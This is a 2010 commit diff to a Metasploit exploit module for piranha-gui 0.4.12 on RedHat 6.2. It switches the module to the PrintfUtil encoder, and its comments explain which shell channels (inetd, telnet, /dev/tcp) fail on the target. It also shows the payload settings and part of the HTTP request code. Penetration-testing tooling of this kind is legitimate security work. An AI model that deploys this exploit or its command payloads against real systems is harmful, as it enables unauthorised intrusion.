clarify limitations, update to use PrintfUtil encoder

git-svn-id: file:///home/svn/framework3/trunk@9614 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-24 22:39:54 +00:00
parent f0a4812644
commit 3cb116db99
1 changed files with 14 additions and 8 deletions

View File

@ -49,17 +49,23 @@ class Metasploit3 < Msf::Exploit::Remote
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x22\x27", # magic_quotes_gpc
# NOTE: We specify our own custom-ish encoder here.
# This is due to lots of incompatabilities with the old RedHat 6.2 test system.
# 1. inetd exists, but the syntax is no good.
# 2. telnet exists
# 3. /dev/tcp doesn't work.
# 4. PHP's magic_quotes_gpc is on by default, causing escaping of single/double quotes.
# 5. echo -ne doesn't work
'EncoderType' => Msf::Encoder::Type::PrintfUtil,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic',
# inetd works, but not on RH6.2 syntax wise. telnet also, but /dev/tcp not found.
# others use single quotes which apache/bash/htpasswd escapes (\) and breaks. sigh!
}
},
'Targets' =>
[
[ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { }]
[ 'Automatic (piranha-gui-0.4.12-1.i386.rpm)', { } ]
],
'DefaultTarget' => 0))
@ -78,7 +84,8 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw({
'uri' => str,
'method' => 'GET',
'headers' => {
'headers' =>
{
'content-type' => 'application/x-www-form-urlencoded',
},
}, 3)
@ -92,4 +99,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end